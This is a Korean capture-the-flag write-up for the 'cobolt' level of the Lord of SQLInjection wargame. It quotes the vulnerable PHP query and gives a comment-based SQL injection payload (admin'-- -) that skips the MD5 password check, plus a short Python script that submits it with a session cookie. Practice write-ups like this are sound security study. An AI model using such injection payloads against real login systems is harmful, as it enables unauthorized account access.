[LORD OF SQLINJECTION] cobolt

Write Up

 위 문제들은 query문과 해당 소스코드를 알려줍니다.
이를 이용하여 solve() 함수를 실행시키면 문제가 풀리는 형식입니다.

 

이전 gremlin 문제와 매우 유사하네요

https://los.rubiya.kr/gate.php

---

소스 코드 분석

...
#import point!!
$query = "select id from prob_cobolt where id='{$_GET[id]}' and pw=md5('{$_GET[pw]}')";  
...
if($result['id'] == 'admin') solve("cobolt");
elseif($result['id']) echo "<h2>Hello {$result['id']}<br>You are not admin :(</h2>";

---

크게 달라진 부분이자 핵심인 부분입니다.
앞에 봤던 문제와 유사하나, PW를 md5로 암호화 한 모습을 확인 할 수 있습니다.
즉, 전에는 brute force 공격으로도 가능했다면 이젠 좀 더 걸린다는 의미?

 

SQL injection을 하기에 저희는 전과 같은 형식으로 하면 사실 풀린답니다..

MD5(Message-Digest algorithm 5)란?

128비트 암호화 해시 함수 
RFC 1321로 지정되어 있으며, 주로 프로그램이나 파일이 원본 그대로인지를 확인하는 무결성 검사 등에 사용

MD5는 한때 데이터 보안(암호화)에 사용되었으며 , 그러나 요즘 주요 용도는 인증입니다. 때문에 해커 완전히 다른 파일과 정확히 동일한 해시를 가진 파일을 만들 수 있으며 누군가가 파일을 무단 변경하는 경우 MD5가 안전하지 않습니다.

 

그러나 현재는 단순히 한 장소에서 다른 장소로 파일을 복사하는 경우 MD5가 작업을 수행합니다.

What Is the MD5 Hashing Algorithm and How Does It Work?

그러기에 해당 PW을 삽입하는 부분을 그냥 우회하면 문제가 해결되겠네요.

---

Soultion

Where의 주석(우회)

https://los.rubiya.kr/chall/cobolt_b876ab5595253427d3bc34f1cd8f30db.php

?id=admin%27--%20-
?id=admin'-- -

해당 부분은 GET방식으로 얻기에 URL에 입력을 하여 SQL문을 동작합니다.

전에 문제와 너무 똑같이 풀었나요..? id가 admin이야 하니까 수정한 모습
근데 뭐.. 이렇게 해도 풀리기 때문에 다른 방법이 있다면 알려주세요
(저는 귀찮아서 이렇게 할랍니다 ㅠ)

Exploit Code

#!/usr/bin/python3
from requests import get
from pwn import *

url = 'https://los.rubiya.kr/chall/cobolt_b876ab5595253427d3bc34f1cd8f30db.php'
cookies = dict(PHPSESSID='05ivanqqvt1mh4gvt59jiihjj5')

query = "?id=admin'-- -"

def pw_leak(url, query):
    r = get(url+query, cookies=cookies)

    if r.text.find('<h2>COBOLT Clear!</h2>') > 0:
        log.success('Success!!')
    else:
        log.failure('False :(')

if '__main__' in __name__:
    print(url)
    pw_leak(url, query)

---

참고 자료

 

참고 이미지